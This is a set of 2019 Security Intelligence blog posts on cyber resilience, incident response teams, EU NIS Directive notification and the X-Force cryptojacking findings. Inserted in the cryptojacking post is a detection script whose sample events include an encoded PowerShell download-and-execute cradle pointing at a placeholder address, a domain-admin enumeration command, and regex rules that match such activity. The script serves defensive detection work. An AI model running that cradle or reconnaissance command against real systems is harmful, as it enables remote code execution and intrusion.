
Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

In February 2019, the World Economic Forum (WEF) released a special report titled “Cyber Resilience in the Electricity Ecosystem: Principles and Guidance for Boards,” which supplements a prior report on cyber resilience issued in 2017. In light of the interconnectedness of organizations and ecosystems today, I’d argue that the report’s main principles can apply well beyond the electrical industry. Examples of other ecosystems that could be severely disrupted — or, worse, catastrophically impacted — by cyberattacks or cyber failures include the global banking sector, global stock exchanges, and the transportation sector and its supporting infrastructure.

We Need a Systemwide View of Resilience

Of course, it is easier to mentally conceive of the impacts of cyber risks on the electrical grid as they relate to our way of life; many of us have had the displeasure of living through a blackout, where the noise of our busy lives suddenly gives way to the deafening silence of a powered-down world. However, as organizations begin to understand and take stock of the interconnectedness of their supply chains and the intricate nature of their business partnerships, the cyber risk discussion must evolve from internally focused defenses and reactions into a larger systemwide view of resilience.

To help guide global stakeholders — government leaders, boards of directors, top leadership, and IT and security leaders — the WEF resilience report provides a number of principles that organizations should follow and governments should keep a close eye on. Failure to act now, while we still can — and can do so at a reasonable cost — could lead to systemic shocks and engender cascading failures on a scale never seen before.

While the idea of “stress tests” has been used many times in the financial sector, its applicability to our connected world is long overdue. But it all starts at the top, with a strong governance principle.

The Governance of Cyber Resilience

Over the past decade, there has been a shift in the boardroom to pay increasing attention to the issues of cybersecurity and cyber risks. Instead of leaving those issues for IT to deal with, board directors have rightfully become more engaged in overseeing management’s activities and, by extension, ensuring that the organization is as cyber resilient as it needs to be.

At the board level, resilience in the cyber realm isn’t about asking, “Are we doing something?” or, “What are we doing?” but rather, “How well are we doing?” and, “How do we know we would be able to recover from a cyber outage?” The WEF report provides several questions for boards to ask of top leadership and chief information security officers (CISOs), such as:

  • How much operational technology (OT) do we have? How much crossover is there between OT, IT and physical security? Could an issue in one domain move into another?
  • Have roles and responsibilities for each area — resilience for IT, OT and physical — been defined? How well do these areas collaborate or integrate with one another, as opposed to operating in silos?
  • What processes and structures are in place to “ensure a coordinated cyber resilience strategy” across the organization?

For the CISO, this is an opportunity to be more of a strategic partner and adviser to top leadership and the board, to shed much-needed light on just how well the organization is prepared to detect, contain and recover from a cyber disruption. However, having the board’s support is key to helping the CISO break what are otherwise longstanding barriers and the “this is how we’ve always done it” attitude. With that support, the CISO can work to integrate cyber risk management into all business decisions.

Resilience by Design

One of the most striking differences between IT and OT is their very different design imperatives. Most of IT was designed with short component lifetimes (3–5 years), a preference for confidentiality (at least when compared to expectations for OT components), and expectations that delays, while inconvenient, are part of the IT ecosystem as components are replaced, upgraded or simply patched.

By contrast, OT components are designed to last 10 to sometimes 20 years, with high-availability requirements under near real-time conditions, meaning there’s never a good time to take OT systems down for maintenance or patching.

It is thus critical to design and deploy cyber resilient components for new IT and OT systems and closely monitor existing systems already in place. On this front, board directors are told to ask questions such as:

  • How are cyber risks considered and accounted for at the onset of new projects and in current operations, across the business?
  • How does management ensure that appropriate controls have been put in place, and how is the effectiveness of those controls evaluated and monitored? Just how cyber resilient are current systems?
  • How does leadership communicate the importance of cyber resilience throughout the organization and enable cross-functional information flows?

The good news is that boards and management can empower their CISO and the rest of the security function to take the lead on providing answers to these questions. The bad news is that looking at the organization as an island isn’t the right approach; we must consider the whole ecosystem.

Reciprocal Impacts Between Organizations and Ecosystems

Boards are also coming to grips with the reality that compliance isn’t sufficient to safeguard their organization’s operations and profits given the complex, highly interconnected ecosystems they operate within. With this realization, boards are asking better questions and engaging in enterprise risk conversations to drive important topics, such as the availability and distribution of security resources and budgets, and a more holistic approach to enterprise risk management that goes beyond compliance to also include risk appetite and alignment with organizational goals and strategy.

Beyond the internal focus, boards are also asking top leadership to look outward, to ensure that management is aware and understands how changes and disruptions in the ecosystem can impact the organization and, conversely, how disruptions in the organization’s own IT and OT could impact the wider ecosystem.

This focus goes beyond the routine of third-party vendor assessments and the management of those particular risks to include a broader view of the risks posed to the organization by the ecosystem and vice versa: highest external risks and their impacts, reputational risks, external dependencies and procurement process agility, testing and integration of new systems, and preparedness against cascading failures originating outside the organization.

Collaborate and Test Across Your Ecosystem

With the realization that “we’re all in this together,” boards want to learn how effectively their organizations are collaborating with the rest of the ecosystem in planning and testing cyber resilience. What mechanisms are in place to share best practices and alerts (e.g., the various Information Sharing and Analysis Centers in the U.S.)? What government resources or bodies are available to interface with? How does management ensure that it is aware of relevant information that may be shared with the organization via those channels? How is information received through such channels used for strategic decisions by management?

A clear example of this commitment to collaboration across the ecosystem for the betterment of all is the Charter of Trust, which leading global companies such as Siemens, Airbus, Allianz, Daimler and IBM have signed on to as a way “to strengthen trust in the security of the digital economy.” The 10 principles outlined in the Charter of Trust are fully aligned with, and reinforce the commitment of, the management of each of those companies to creating a better, safer digital ecosystem for us all.

While collaboration and sharing of threat information and best practices is key, the entire ecosystem would be left in a highly fragile state if peers and competitors didn’t also collaborate to prepare and test their cyber resilience plans. Once again, the CISO is well-placed to be part of those discussions and exercises, to help evaluate just how well the ecosystem can respond to and recover from a cyber incident.

Top leadership and board directors are coming to grips with the need for their organizations — together with their peers and competitors in the ecosystem — to be more resilient to cyber attacks and disruptions. CISOs, who now have a seat at the table, must play a leading role in this effort.

The post Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Christophe Veltsos


5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line

How you respond to a data breach matters.

In today’s world, most companies have documented policies and technologies that can help prepare them for grappling with a cyber intruder, but in many cases those tactics are insufficient — focusing more on answering questions about the incident itself and less about an integrated response that protects reputation, the business and, most importantly, clients.

A breach can be damaging, and the inability to respond effectively can add even more self-inflicted damage. The good news is, while you can’t control whether or not you’re a target of a breach, you can control how — and how well — you respond.

Leading organizations that analyze business trends have taken note of the importance of an integrated response. Earlier this week, Forrester released “The Forrester Wave: Cybersecurity Incident Response Services, Q1 2019.” This report encourages customers to look for providers that can ensure timely preparation and breach response. Some characteristics highlighted in the report include vendors that have cyber range capabilities to train employees in the event of an attack and provide thorough deliverables that help beyond the postmortem of the incident.

Forrester evaluated 15 incident response (IR) service providers and weighed them across 11 criteria. These vendors were identified, evaluated, researched, analyzed and scored. The Forrester Wave report shows how each provider measures up and helps security and risk professionals make the right choice. Forrester noted that IBM “is a strong choice for training and incident preparation services” and that it “attaches X-Force threat intelligence analysts to its IR teams to ensure full situational awareness across the investigation.”

The IBM X-Force Incident Response and Intelligence Services (IRIS) team was created in 2016 and launched alongside the X-Force Command Cyber Range in Cambridge, Massachusetts. We knew that pairing a strong IR team with an immersive range experience that tests skills to survive the inevitable would greatly increase the success our clients experience in the event of a breach.

5 Characteristics of an Elite IT Team

As leaders of the X-Force IRIS team, we’ve been on the front line of hundreds of security breaches and built a team of elite practitioners that help clients recover quickly and effectively in the wake of an attack. Here are the top five characteristics of a world-class response team, based on our experience.

1. It Starts With People

One of the things we often say is, “IR is a team sport.” And with any team, it’s important to make sure each player has a unique set of skills that, when combined with the rest, compose a formidable force against your opponent.

The right team with the right skills means you solve problems faster, build more creative solutions to challenges, and have diverse insight and perspective on situations that allows you to view the problem from a variety of angles. That’s important, because often the attackers have assembled teams of skilled individuals that represent different experiences and perspectives themselves, so constructing an internal team in a similar manner enables you to quickly identify tactics and anticipate the next move.

2. Great Technology, Dynamic Analysis

When you’re technology agnostic, you can go beyond the tools available in your backyard and better ensure you’re getting the right capabilities to achieve your objective. We’ve learned that when we’re not tied to a specific technology or limited to one analytical methodology, we can rapidly evolve our approach to swiftly detect an attacker’s ever-shifting activity.

3. Embedded Threat Intelligence Capabilities

For every case we open, we embed an intelligence analyst who stays involved from start to finish. They bring a consistent intel perspective to each case, augmenting their own skills by leveraging unique insights from the larger intelligence team. Their combined insight gives us exceptional views into an adversary’s actions, tools and methodologies. Understanding these aspects allows faster, more accurate mitigation actions.

4. Comprehensive Remediation

There are two important focus areas for remediation: tactical and strategic. The tactical emphasizes removing an attacker and their access from the victim environment, and the strategic centers on ensuring that same type of attack is not successful again. They both matter, because getting an intruder out quickly and making sure you’re not vulnerable to the same kind of exploitation keeps you safer.

But there’s an element that goes beyond the tactical and the strategic: rebuilding an environment that’s been destroyed as the result of an attack. Rebuilding an environment requires a set of precision skills and, often, a great deal of human resources to ensure it’s done quickly, accurately, and in a way that enables you to continue to operate while rebuilding and recovery take place.

We built the X-Force IRIS team with a set of practitioners that, together, represent thousands of hours of experience rebuilding devastated environments from the ground up. That means when a client has been ravaged by an attack, it can rely on us to not only help it remediate, but keep its business running while we rebuild anew.

5. Train Like You Fight, Fight Like You Train

Even the best IR plan is insufficient if you don’t practice it. We encourage clients to run battle drills on their IR plans (and even put our own to the test). While tabletop exercises can be informative, by far the best way to train for a cyber breach is through an immersive, instructor-led range experience.

We combine our IR expertise with the X-Force Command Cyber Range. Here, we immerse clients in a highly gamified scenario that tests not only their IR plan, but also their human abilities to respond and adapt in a crisis. This helps uncover gaps in existing processes and silos in an organization and develop ways to respond to a breach in an integrated fashion that can’t be replicated in any other way.

Competitive Collaboration

Leaders named in the Forrester Wave — such as FireEye, CrowdStrike and Deloitte — are proving that effective incident response is worth the investment. And as competitors, we have the opportunity to share information and create a more robust collective defense for our clients when possible. We are enthusiastic about opportunities like this that allow us to share and build knowledge, because when cybersecurity is implemented correctly, it enables transformation and business growth regardless of the competitive landscape.

The X-Force IRIS team’s investigative and analytical methodology will continue to adapt to meet future IR challenges. By combining cutting-edge methodology with new technologies across disjointed security layers, we envision that our clients will get the context they need to eliminate the noise and identify the most critical threats so they can get back to what matters most: their core business.


Author: Ahmed Saleh


Breaking Down the Incident Notification Requirements in the EU’s NIS Directive

Our society relies on the availability, security and reliability of network and information systems (NIS). Various security frameworks provide standards and guidance as to which measures organizations should implement to protect IT systems and increase resilience. However, since such recommendations are not ingrained as actual laws in most countries, these best practices and guidelines are often followed solely on a voluntary basis.

This is in contrast to the European Union’s (EU) NIS Directive, legislation that sets a range of network and information security requirements to augment IT security across all EU member states. While the directive covers a few different domains, including preparedness, cross-EU collaboration and incident response (IR), one of its main pillars focuses on breach notification requirements.

In this post, we will focus specifically on the aspects of incident notification contained in the NIS Directive as they apply to operators of essential services (OES).

Regulations Versus Directives

The NIS Directive is a different type of legal act compared to, say, the General Data Protection Regulation (GDPR). The latter is immediately applicable and enforceable by law in all member states. A directive is somewhat different.

While it also applies to all member states, instead of being immediately applicable, it sets goals, requirements and results that must be achieved. It is then up to each member state to devise its own laws on how to reach these goals and what types of penalties noncompliance will carry. The NIS Directive also sets a floor: additional requirements may apply depending on the organization’s industry sector and the member state(s) in which it operates.

This legal status reveals one of the possible issues with a directive: Whereas a regulation is direct law, a directive needs to be transposed into local laws by each member state. These transpositions can result in differences in the implementation of the directive into law, in some cases complicating matters for organizations that operate across borders.

Variance in Incident Notification Definitions

One of the articles in the NIS Directive that has received a lot of attention is Article 14, which outlines requirements for security and incident notification. It stipulates that member states must ensure that OES notify the national competent authority and the national computer security incident response team (CSIRT) in case of an incident that significantly impacts the continuity of an essential service. This is not entirely new — depending on the type of activity or sector, there are already requirements for incident reporting in Europe, including Article 13a of the Telecom Framework Directive.

An additional element of complexity is that, according to Article 5, the identification of OES per sector needs to happen individually within each member state. Although organizations might give input to this process, the actual identification is out of their hands. This process is another way by which the directive could result in various interpretations that end up adding complexity.

The Benefits of Incident Notification

One of the drivers for notification in the context of the directive is to be compliant with legal requirements. However, if the starting point of your organization is to only comply with the bare minimum of these notification requirements, then you will miss out on the opportunities provided by the directive.

Additionally, the bulk of these requirements, including notification and detection capabilities, should already be covered in large part by your existing security environment. If this is not the case, you can use the NIS Directive as a wake-up call to improve your security posture.

From a policymaker’s point of view, the notification requirements can help better identify the challenges within a sector and propose mitigation measures that are based on actual facts and figures. These facts and figures can then be used by CSIRTs (or a responsible authority) to provide more relevant warnings and situation reports together with sector-specific threat intelligence. Similarly, this information can also be used to evaluate cross-border impact of incidents or threats and optionally notify other member states.

Breaking Down Notification Requirements

Now, let’s dive into some details of the NIS Directive. There are essentially three main parts to the notification requirement.

First, prior to notification, organizations need to be able to detect security incidents — i.e., they must possess appropriate detection capabilities. The second part involves defining what a significant incident is and what risks, either directly or indirectly, can have significant impact on an essential service. The last part of the notification requirement involves understanding when, what, how and to whom organizations must report incidents.

First Things First — Detection

Every notification starts with proper detection of an incident. You can find guidelines on detection capabilities in a reference publication from the NIS Cooperation Group on security measures.

The core principles for these security measures include being effective, tailored, compatible, proportionate, concrete, verifiable (evidence of the effective implementation of security policies) and inclusive (includes all security domains that may contribute to reinforcing cybersecurity).

Applying NIS measures to the domain of detection and resilience can be done by:

  • Setting up a detection system to analyze files and protocols — this can include, for example, network intrusion detection systems (NIDSs) or malware sandboxes;
  • Enabling logging on critical systems (log entries should include time stamps);
  • Collecting the logs centrally; and
  • Conducting log correlation and analysis on the events coming from critical systems.

All of the above actions can also be automated with a security information and event management (SIEM) solution.

After Detection — Defining Incidents

But what, exactly, is a security incident? Article 4 defines it as any event that has an actual “adverse effect” on the security of network and information systems. As a side note, the directive does not include a definition of what is covered by “adverse.”

Based on the information from the NIS Cooperation Group, we can combine the definition of an incident with the definition of security of network and information systems. This would redefine an incident to be any event that affects the authenticity, confidentiality, integrity or availability of network and information systems, and has a significant impact on the continuity of the essential service itself.

What Is a Significant Incident?

A set of three parameters from Article 14 of the NIS Directive can be used to determine what is considered a significant incident:

  • The number of users that are affected by the disruption of the essential service.
  • The duration of the incident.
  • The geographic spread of those affected by the incident.

Additionally, the parameters from Article 6 are also helpful in defining what qualifies as a significant incident:

  • What is the dependency of other OES on the service affected by the incident?
  • What is the impact (degree, duration) on economic and social activities or on public safety? In particular, the impact on social activities can be hard to measure for OES.
  • How large is the market share of the affected service?
  • What is the geographic spread that could be affected?
  • How important is the affected element for maintaining a sufficient level of service?

In general, these parameters are most often already included in what OES are accustomed to using to define crises within their services that are unrelated to IT.

The actual criteria, thresholds and parameters for determining significant incidents are defined by member states. These can include the parameters defined in the NIS Directive, possibly extended by individual member states with additional or sector-specific criteria.

The Directive’s Notification Timeline

According to Article 14, organizations need to notify without undue delay, although this timeline can be shortened or specified based on the member state. The term “undue” can also be subjective, but in most cases, this means the organization must send a preliminary notification whenever an incident is first detected, even if all the details are not available yet. The goal is to raise awareness. As your investigation progresses, you can provide intermediate follow-ups, and when the incident is closed, you can provide a full report.

It’s fairly simple to implement this step. Your IR plan should already include a notification and escalation path for certain types of critical incidents during the detection and analysis phases. It should also foresee a final incident report as part of the lessons-learned phase.

In essence, this requirement is an extension of an already established IR plan and recovery process.

Where to Report?

Each member state is free to choose its own reporting framework. This can be the national authority, sectoral authorities or a combination of both, in addition to notifying the national CSIRT.

As an organization, it is important to identify to whom you have to report, exchange contact details between your security team and the notification body, and establish and test this communication process.

Use the NIS Directive as an Opportunity

Similar to the GDPR, you can approach this directive as a roadblock or a nuisance, or you can consider it an excellent opportunity to improve your security posture. The fact that some security requirements are legal requirements can help you further establish your security program.

There are many articles in the directive to take into account, but you should start by focusing on the following:

  • Article 4, which defines a security incident;
  • Article 5, which mandates that member states should identify OES;
  • Article 6, which sets additional parameters to define significant incidents; and
  • Article 14, which requires you to implement security measures and notification processes. This article also contains the three base parameters to define what is a significant incident and describes the accepted delay for notifications.

Unfortunately, despite the fact that the bulk of the NIS Directive has been well-known for quite some time, not all EU member states have finalized the phase of transposing the recommendations into actual laws.

If this is the case for your environment, you might benefit from the situation and provide your lawmakers with input for security measures that would actually improve the level of security for network and information systems in your sector.

Author: Koen Van Impe


Recapping IBM Think 2019 and HIMSS19: The Shared Landscape of Global Security

With IBM Think 2019 and HIMSS19 in the books, it’s worth making time for a quick debrief. Which topics resonated the most with attendees? Where did conference themes and discussions overlap? And what’s on the horizon for global cybersecurity this year and beyond?

Key Takeaways From Think 2019 and HIMSS19

According to IBM CEO, President and Chairman Ginni Rometty in her Think opening address, “chapter two” of digital transformation has arrived. For Rometty, this next chapter is scalable, driven by artificial intelligence (AI) and embedded across the enterprise. But without information architecture, she noted, “there is no AI.”

Trust underpins every aspect of effective digital transformation. This ties into IBM’s biggest push during the conference: Watson Anywhere. Built on the open-source orchestration engine Kubernetes, the microservices-based Watson Anywhere empowers organizations to run AI across the cloud environment of their choice, in effect democratizing AI technology to meet consumers along the path of their digital transformation journey — wherever they may be.

HIMSS19, meanwhile, had a clear focus on patient data, specifically the development of interoperability rules that prevent data blocking and empower effective information sharing. But there was also significant overlap with IBM’s initiatives; as Healthcare Dive reported, cloud and AI innovations were on full display at the Orlando event. Even more telling was the conference’s tag line, “Champions of Health Unite,” which speaks to the democratization and rapid uptake of healthcare technology, in turn allowing patients to manage their own healthcare experiences.

Hot Topics in San Francisco and Orlando

In San Francisco, IBM thought leaders, innovators and industry front-runners provided hundreds of great sessions for attendees, covering topics from AI acceleration to quantum computing and innovative security. Highlights included:

  • Accelerating the Journey to AIWhile 80 percent of organizations recognize the strategic potential of AI, just 19 percent understand what’s required to convert potential into profitability. State of New Jersey Judiciary CIO Jack McCarthy was joined by IBM Cloud and Cognitive Software Senior Vice President Arvind Krishna and other experts to help attendees develop a prescriptive approach to AI development across any cloud.
  • Innovation Doesn’t Happen Without Security. And Security Needs InnovationGlobal security challenges demand innovative technologies capable of doing more than responding to threats as they occur. But the innovation required to stay ahead of your competition isn’t possible without a solid security foundation. In this session, IBM Security General Manager Mary O’Brien, Westfield Insurance CISO Kevin Baker and former professional racecar driver Danica Patrick tackled the cyclical challenge of security, innovation and IT evolution.
  • The Journey to Cloud Community CrowdChat — In a more free-form session, the #Think2019 conference community CrowdChat tackled the challenge of cloud transition. According to Silicon Angle, chat participants highlighted both emerging needs for cloud-native tools capable of delivering “unprecedented flexibility” and commensurate security practices that drive both effective application development and DevOps processes.
  • Access the Future Today: Quantum Computing — While quantum computing has largely been confined to high-level enterprise use, this IBM session — led by Dr. Dario Gil, director of IBM Research — spoke to the development of road maps for mainstream adoption of quantum computing and how businesses could benefit from quantum solutions in the near term.

At HIMSS, meanwhile, hot conference topics included:

  • Patient-Centric Health Information Exchange — Disparate health information management systems are causing problems for physicians and patients alike. In this session, IBM Blockchain Solutions Architect Shahryar Sedghi and AT&T Director of Healthcare Solutions Thyge Knuhtsen helped define the requirements for patient-centric healthcare interoperability resources that leverage tools such as blockchain to “liberate” personal healthcare data.
  • Combating Cyberattacks with a Security Residency — Jennifer Kady, director of IBM Security solutions for the U.S. public sector, tackled the increasing risk of cybersecurity incidents with a new solution: security “residencies” that help train healthcare IT teams to effectively respond in the event of an attack.
  • Mitigating the Next Generation of Risk: Connected Medical Devices — The use of connected medical devices is on the rise, but just 51 percent of device manufacturers follow FDA guidance to mitigate risks. This session focused on the development of programmatic, end-to-end security approaches to secure both IT assets and medical devices.
  • Reactions from the Field: AI — Three industry leaders came together for a discussion of healthcare AI in the field. What’s working, what isn’t and what needs to change? From streamlining workflows to eliminating repetitive tasks, cloud-based AI has real potential for healthcare if companies can leverage clean, normalized “good data” to make accurate predictions and take critical action.

The Future of Global Security

Cybersecurity is now a serious global concern. For healthcare organizations, this is reflected in the $1.4 million it costs to recover from “average” cyberattacks, according to HealthITSecurity, and worrisome data from Proofpoint that shows health-focused email attacks are up 473 percent over the last two years. For IBM, AI-driven digital transformations aren’t possible without the solid foundation of innovative security and consumer trust.

Taken together, the topics and keynotes from both conferences suggest three emerging trends for cybersecurity in 2019:

  • Intelligence-driven response — Innovation drives success, and security is no exception. The rise of any-cloud AI makes innovative, intelligence-led incident response (IR) an attainable goal, and one that will quickly become necessary as threat actors leverage their own versions of AI to compromise global targets.
  • Personalized accountability — Patient healthcare data is an incredibly valuable resource. While the shift to “unblocked” data offers more granular control for patients and caregivers alike, it also speaks to the need for increased accountability; from connected devices to security readiness, enterprises must be prepared to defend data both at scale and in situ.
  • Open data defense — Interoperability is critical for healthcare data, and data sharing is paramount for advanced AI systems. As data becomes more “open,” organizations must leverage advanced solutions such as quantum computing and IBM X-Force residencies to help defend this critical resource.

We’re only a few months into the year, but HIMSS19 and Think 2019 have already helped shape this year’s focus on enterprise transformation, innovation and global cybersecurity.

The post Recapping IBM Think 2019 and HIMSS19: The Shared Landscape of Global Security appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Douglas Bonderud

cryptocurrency, cryptocurrency miner, IBM Security, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Incident Response (IR), Ransomware, Skills Gap, threat hunting, Threat Intelligence, X-Force,

Cryptojacking Rises 450 Percent as Cybercriminals Pivot From Ransomware to Stealthier Attacks

Cybercriminals made a lot of noise in 2017 with ransomware attacks like WannaCry and NotPetya, using an in-your-face approach to cyberattacks that netted them millions of dollars from victims. But new research from IBM X-Force, the threat intelligence, research and incident response arm of IBM Security, revealed that 2018 saw a rapid decline in ransomware attacks as cybercrime gangs shifted tactics to remain under the radar.

Ransomware attacks declined by 45 percent between Q1 2018 and Q4 2018, according to the research. That doesn’t mean cybercrime is on the decline, however. Instead, cybercriminals employed cryptojacking, the stealthy theft of computing power to generate cryptocurrency, at a much higher rate. Cryptojacking surged by 450 percent over the course of 2018, according to the newly released “IBM X-Force Threat Intelligence Index 2019.”

Wendi Whitmore, global lead of the IBM X-Force Incident Response and Intelligence Services (IRIS) team, said in an interview that ransomware was highly successful for several years, but the payoff was starting to decline.

“It appears, for a variety of reasons, cybercriminals are getting less money from ransomware attacks and potentially getting a better return on their investment and their time from cryptojacking,” Whitmore said.

IBM X-Force observed a 45 percent decline in ransomware attacks and a 450 percent increase in cryptojacking over the course of 2018, as shown by the trend lines in this chart.

Cryptojacking and Other Stealth Attacks

The term cryptojacking refers to the illicit use of computing resources to generate cryptocurrency such as bitcoin, which peaked in value at nearly $20,000 in late 2017, and Monero, which has generated millions of dollars for cybercriminals over the past decade.

Cryptojacking is carried out either by infecting a victim’s computer with mining malware or by injecting a mining script into web pages the victim’s browser loads. Either way, the miner uses the processing power of the hijacked computer to mine (generate) cryptocurrency. The spike in central processing unit (CPU) usage may cause systems to slow, and enterprises may be affected by the presence of the malware on their network servers and employee devices.

While less destructive than ransomware, the presence of cryptomining malware in an enterprise environment is concerning because it indicates a weakness that the same attacker, or another, could use for more damaging attacks.

“The victim doesn’t usually know their computer has been taken over for that purpose,” Whitmore said.

Yet an even stealthier form of attack doesn’t use malware at all. More than half of cyberattacks (57 percent) seen by X-Force IRIS in 2018 did not leverage malware, and many involved the use of nonmalicious tools, including PowerShell, PsExec and other legitimate administrative solutions, allowing attackers to “live off the land” and potentially remain in IT environments longer. These attacks could allow cybercriminals to harvest credentials, run queries, search databases, access user directories and connect to systems of interest.

Attacks that don’t use malware are much more challenging for defense teams to detect, Whitmore said, because they are leveraging tools built into the environment and can’t be identified through signatures or typical malware detection techniques. Instead, defense teams need to detect malicious commands, communications and other actions that might look like legitimate business processes.
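The detection problem described above, as an added example that is not part of the IBM report or the X-Force index: a small rule set run over constructed process-creation records (fields modelled on Sysmon event 1 and Windows event 4688). The events, host names, user names and the 203.0.113.5 address are all placeholders built inline; the rules flag the built-in-tool patterns the text names, namely encoded PowerShell, download cradles, PsExec’s service and domain discovery commands, none of which involve a malware signature.

```python
"""Triage of process-creation events for 'living off the land' activity.

Added example, not from the IBM report: a small rule set run over
constructed process-creation records (fields modelled on Sysmon event 1
and Windows event 4688) that flags the built-in-tool patterns the text
describes: encoded PowerShell, download cradles, PsExec's service and
domain discovery commands.
"""
import base64
import re

# A -EncodedCommand payload is base64 of UTF-16LE text, so build one the
# way an attacker's tooling would. The 203.0.113.5 address is a placeholder.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
    .encode("utf-16le")).decode()

# Constructed sample events; hosts and users are placeholders, not real logs.
EVENTS = [
    {"id": 1, "host": "WS01", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmd": "notepad.exe report.txt"},
    {"id": 2, "host": "WS01", "user": "CORP\\jdoe", "parent": "WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe -NoP -W Hidden -Enc " + ENCODED},
    {"id": 3, "host": "SRV02", "user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe",
     "image": "C:\\Windows\\PSEXESVC.exe", "cmd": "C:\\Windows\\PSEXESVC.exe"},
    {"id": 4, "host": "SRV02", "user": "CORP\\jdoe", "parent": "PSEXESVC.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmd": 'cmd.exe /c net group "Domain Admins" /domain'},
    {"id": 5, "host": "WS03", "user": "CORP\\admin1", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\ipconfig.exe", "cmd": "ipconfig /all"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DISCOVERY = re.compile(
    r"net\s+(?:user|group|localgroup)\b[^&|]*/domain|nltest\s+/dclist|whoami\s+/all|\bdsquery\b",
    re.IGNORECASE)
CRADLE = re.compile(r"IEX|Invoke-Expression|DownloadString|DownloadFile|FromBase64String",
                    re.IGNORECASE)
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmd):
    """Plaintext of a -EncodedCommand/-enc argument, or None if there is none."""
    m = ENC_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(events):
    """Return (event id, rule, detail) for every rule each record trips."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        parent = ev["parent"].lower()
        cmd = ev["cmd"]
        if image in ("powershell.exe", "pwsh.exe"):
            plain = decode_encoded_command(cmd)
            if plain is not None:
                findings.append((ev["id"], "encoded_powershell", plain))
            if parent in OFFICE_PARENTS:
                findings.append((ev["id"], "office_spawned_powershell", parent))
            # Match cradles against the decoded payload when there is one.
            hit = CRADLE.search(plain if plain is not None else cmd)
            if hit:
                findings.append((ev["id"], "download_cradle", hit.group(0)))
        if image == "psexesvc.exe" or parent == "psexesvc.exe":
            findings.append((ev["id"], "psexec_service", ev["user"]))
        hit = DISCOVERY.search(cmd)
        if hit:
            findings.append((ev["id"], "domain_discovery", hit.group(0)))
    return findings

if __name__ == "__main__":
    for event_id, rule, detail in triage(EVENTS):
        print(f"event {event_id}: {rule}: {detail}")
```

Run stand-alone, the script flags event 2 three times (an encoded command, PowerShell spawned by Word, and a download cradle visible only after decoding), event 3 for the PsExec service binary, and event 4 twice (a child of that service running domain group enumeration), while the two benign records produce nothing. The point a practitioner should take from it is that every signal comes from parent/child relationships and command-line content, which is exactly the telemetry that has to be collected before living-off-the-land activity can be detected at all.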

“Attackers are identifying that it’s a lot easier to stay in an organization longer-term if they don’t install anything funny that might get detected by a wide variety of technologies, or by really smart defenders who are constantly looking in the environment to identify something that’s new or different,” Whitmore said.

Attackers are infiltrating IT environments with stealthy techniques that target misconfigurations and other system vulnerabilities, Whitmore said, and using tried-and-true methods that are still very difficult to prevent at a wide scale, such as phishing. Publicly disclosed security incidents involving misconfiguration increased by 20 percent between 2017 and 2018, according to X-Force research. Meanwhile, IBM X-Force Red, an autonomous team of veteran hackers within IBM Security who conduct various types of hardware and software vulnerability testing, finds an average of 1,440 unique vulnerabilities per organization.

Still, humans represent one of the largest security weaknesses, with 29 percent of attacks analyzed by IBM X-Force involving compromises via phishing emails. Nearly half (45 percent) of those phishing attempts were business email compromise (BEC) scams, also known as CEO fraud or whaling attacks.

These highly targeted attacks are aimed at individuals responsible for making payments from business accounts, claiming to come from someone inside the organization such as the CEO or chief financial officer (CFO). The FBI reported that between October 2013 and May 2018, BEC fraud had cost organizations $12.5 billion.

Read the complete X-Force Threat Intelligence Index Report

Transportation in the Crosshairs

Among the more surprising findings in this year’s X-Force Threat Intelligence Index report is the level of attacks on the transportation industry, which was the second-most attacked industry in 2018, behind only financial services. In 2017, transportation was the 10th most targeted industry, but in 2018 it was targeted in 13 percent of attacks, behind financial services, which was targeted in 19 percent of attacks.

“That was a pretty surprising finding for us,” Whitmore said. “To see the transportation industry emerge as the second-most impacted industry really means that we’re seeing a lot more activity overall in that industry.”

A few factors changed the game this year, Whitmore noted, including the industry’s growing reliance on data, website applications and mobile apps, and the increasing amount of information consumers are sharing. Transportation companies hold valuable customer data such as payment card information, personally identifiable information (PII) and loyalty rewards accounts. Cybercriminals are interested in targeting that information to monetize it.

Additionally, Whitmore said, there’s “a widespread attack surface in the transportation industry, leveraging things like third-party providers with legacy systems and a lot of communications systems that are out of their direct management.”

Proactive Defenses and Agile Response

There are signs that organizations are increasing their security hygiene by applying best practices such as access controls, patching vulnerabilities in software and hardware, and training employees to spot phishing attempts, Whitmore said.

Yet cybersecurity is a daily fight, and the security skills gap means security teams have to be agile and collaborative while augmenting their capabilities with supporting security technologies and services.

The IBM X-Force Threat Intelligence report offers recommendations for organizations to increase preparedness through preventive measures such as threat hunting — proactively searching networks and endpoints for advanced threats that evade prevention and detection tools.

Additionally, risk management models need to consider likely threat actors, infection methods and potential impact to critical business processes. Organizations need to be aware of risks arising from third parties, such as cloud service providers, suppliers and acquisitions.

Finally, the IBM X-Force Threat Intelligence Index emphasizes remediation and incident response. Even organizations with a mature security posture may not know how to respond to a security incident. Effective incident response is not only a technical matter; leadership and crisis communications are key to rapid response and quickly resuming business operations.


